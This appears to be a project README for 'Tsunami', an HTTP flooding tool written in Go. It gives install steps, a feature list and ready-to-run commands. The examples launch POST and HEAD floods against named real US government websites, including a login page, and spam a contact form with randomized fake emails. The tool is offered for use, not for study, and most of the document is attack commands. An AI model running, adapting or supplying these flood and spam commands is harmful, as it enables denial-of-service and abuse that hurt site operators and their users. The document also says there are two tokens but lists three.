Tsunami

Tsunami is an advanced HTTP flooder written in Golang. It's currently implemented features include:

• Live attack stats
• Customizable mutlithreading
• HTTPS support (Note: Certificates aren't verified for performance)
• Realistic User Agent randomization
• Dynamic payloads
• Custom headers

Table of Contents

1. Basic Usage
2. Help
3. Quick Install
4. Examples
   • Low Volume POST Flood Lasting Forever
   • High Volume HEAD Flood Lasting For 10 Minutes
   • Contact Us Form Spam
5. Dynamic Tokens
6. Todo

This project is a WIP

Basic Usage

./tsunami http://whitehouse.gov -w 100

Help

./tsunami --help

Quick Install

git clone https://github.com/zayotic/tsunami
cd tsunami
export GOPATH=`pwd`
go get ./...
go build

Dynamic Tokens

Dynamic tokens allows you to implement elements of randomness in your requests. Tokens may be placed in your URL, body, and header values.

There are currently 2 tokens:

• {D} - A random digit
• {l} - A random lowercase letter
• {L} - A random uppercase letter

On every request, every token will be replaced.

Example command:

./tsunami -w 1 http://nsa.gov/{L}{L}{l}{D}

The requests will use URLs similar to these:

http://nsa.gov/AYz3
http://nsa.gov/BCv6
http://nsa.gov/NFz7
http://nsa.gov/IPa1

Examples

Low Volume POST Flood Lasting Forever

./tsunami -w 2 "https://fbi.gov/login" POST "username=Ammar&password=g1thuB123"

High Volume HEAD Flood Lasting For 10 Minutes

./tsunami -w 100 -s 600 "https://cia.gov/" HEAD

Contact Us Form Spam

./tsunami -w 1 "https://zay.li/contact-us" POST "email={l}{l}{l}{l}{l}{l}{l}@gmail.com&message=spamspamspamspam"

Todo

• ???